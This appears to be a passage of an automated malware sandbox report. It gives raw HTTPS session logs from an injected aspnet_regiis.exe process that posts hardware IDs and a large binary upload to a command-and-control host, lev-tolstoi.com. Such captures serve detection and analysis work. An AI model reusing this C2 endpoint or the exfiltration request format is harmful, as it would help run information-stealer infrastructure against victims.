                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wzsM8t4cOd1d%2BFwNEPb18k7ld2dpubbyYhN49h%2BCzkMsZAy12LefFGHv7orzBfpvqmvyzC0FBWZrTORDISt64k9Ah%2Bqnm59%2BIfD1bTGxB6yI96Jd8UUlqlyY006jf5esB5s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f9a0e6dbd1780-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1541&rtt_var=580&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2834&recv_bytes=19131&delivery_rate=1882656&cwnd=171&unsent_bytes=0&cid=99fcf4e35a0f201d&ts=4072&x=0"
                                                                                                                                                                                                                                          2024-12-18 13:46:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                          2024-12-18 13:46:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          4192.168.2.449740172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:47:00 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8791
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:47:00 UTC8791OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76
                                                                                                                                                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
                                                                                                                                                                                                                                          2024-12-18 13:47:03 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:47:03 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=q6bpqkhtntrc1dlv523f8utd6c; expires=Sun, 13-Apr-2025 07:33:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2FnTPr7EYk2hm1R80JKsh69PoChRGVjQ4QUAED8UmBg5Ce7tLkotqW9hk7FS9Ojfyr0a%2B4wuo2zRKFFchbj%2B6IEmqsn%2Fw7%2F7K6eM9eaTrvKV2ICGONvlbHXzR0Hw5yGHER4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f9a3118cf43c4-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1705&rtt_var=650&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2835&recv_bytes=9729&delivery_rate=1669525&cwnd=222&unsent_bytes=0&cid=29c7cc5979b2343e&ts=2966&x=0"
                                                                                                                                                                                                                                          2024-12-18 13:47:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                          2024-12-18 13:47:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          5192.168.2.449742172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:47:05 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 20444
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:47:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76
                                                                                                                                                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
                                                                                                                                                                                                                                          2024-12-18 13:47:05 UTC5113OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06
                                                                                                                                                                                                                                          Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                                                                                                                                                                          2024-12-18 13:47:08 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:47:08 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=mha610i7lit03jdaprvgdvfhq6; expires=Sun, 13-Apr-2025 07:33:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S1lt%2BiqE2r0bkTGhxHpvOXtW%2FliEB1nCNL0bULY%2FYV%2BTgzOWsv2lC2nJzdOdUUPWdaenHM68iTA2UyQdogF5vjbJK6iI%2F1sf8od8i0cJft5WI3H0OlF0M2oZc%2BQPXgXmuSw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f9a4dddec4263-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1902&rtt_var=951&sent=14&recv=25&lost=0&retrans=1&sent_bytes=4210&recv_bytes=21405&delivery_rate=165523&cwnd=247&unsent_bytes=0&cid=37a3af0bb10dbd96&ts=3263&x=0"
                                                                                                                                                                                                                                          2024-12-18 13:47:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                          2024-12-18 13:47:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          6192.168.2.449743172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:47:10 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 1285
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:47:10 UTC1285OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76
                                                                                                                                                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
                                                                                                                                                                                                                                          2024-12-18 13:47:11 UTC1031INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:47:11 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=vuek0t39jiq59nnf2q1c30p92j; expires=Sun, 13-Apr-2025 07:33:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2F8u3DxEV4F89RoTgUxG7Ob7eHFfEwKM2hO0lDMbAr1tjLBKPTF4o8RLT8ddF5OSuusLL9U7BhSCXWkpex0O9M7FuQIRCmaL4ZCFCyVqoif6YonjclAv9sHP84EhjPhtgXk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f9a6f0c26430e-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1607&rtt_var=611&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2201&delivery_rate=1778319&cwnd=186&unsent_bytes=0&cid=c9dcc8cfac7cf2ec&ts=937&x=0"
                                                                                                                                                                                                                                          2024-12-18 13:47:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                          2024-12-18 13:47:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          7192.168.2.449744172.67.157.2544437408C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 588389
                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 36 42 44 45 46 34 30 46 35 44 38 31 44 37 36 34 38 41 37 31 30 36 31 36 41 35 31 30 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 7a 6b 6d 76
                                                                                                                                                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"696BDEF40F5D81D7648A710616A510B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--uzkmv
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: c7 60 24 d7 fc e7 bd e0 8e 2a 1d 35 a9 c3 40 7d 98 6b 1b f4 48 62 0c 70 5b 2a 37 da aa e6 b6 9a ff 60 ae c7 21 9b fb fe 0d 79 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f
                                                                                                                                                                                                                                          Data Ascii: `$*5@}kHbp[*7`!yi*vhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i*5.=4-?
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: 36 c2 83 4b cb 35 df e3 ad 65 4b 2c 77 5c 96 0b 7a f0 2c de 8c cd 42 d2 23 c5 b6 e9 d6 31 d4 77 de ec 38 aa 2d d8 31 17 10 d5 f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0
                                                                                                                                                                                                                                          Data Ascii: 6K5eK,w\z,B#1w8-1Az!}2R~:,CfwekfDOsLRb1@g=i*<74S_5[i#b|{EW_|OOH?);El~VsIiC4xb}^p*i5vXDS3e_E3N3CiVl8~0
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: c4 3f 61 3f 84 01 c9 ec 5f b0 37 17 17 aa c8 8e 69 cf 50 cd 4f e0 94 d2 1e 01 b6 50 f5 9c 84 57 2f c0 9d d4 01 eb b7 37 5f 5d dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5
                                                                                                                                                                                                                                          Data Ascii: ?a?_7iPOPW/7_]`-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa |7r6
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: 15 7e f4 f7 3b 6c 87 79 2c 0f d2 ec 5f 37 09 ee 44 13 69 b9 50 a4 87 ff ba 23 2e 6f e9 47 bd 49 cc 2d 0c 77 b7 a3 67 5a d4 f4 c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92
                                                                                                                                                                                                                                          Data Ascii: ~;ly,_7DiP#.oGI-wgZ/.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn|AU<Q,8sUH^DGO]Sk-9 _l;}%
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: a0 ed f6 bd ba 97 00 49 c7 bd 8e 7f 2d e5 15 28 ca ba 36 e2 91 80 45 f7 7a 80 9c a4 c2 a7 ef ea 76 27 22 a0 3d ed 44 92 67 8d 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d
                                                                                                                                                                                                                                          Data Ascii: I-(6Ezv'"=Dgliu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: 1f 6c e8 cf 50 a5 21 d2 21 6e be c4 d3 5f c0 88 f9 5d 43 3b 49 ff fa 42 37 04 f0 ad 5f 3c cd 7b 14 86 1e 5c a7 50 c2 1e 4b d4 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88
                                                                                                                                                                                                                                          Data Ascii: lP!!n_]C;IB7_<{\PKGlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr
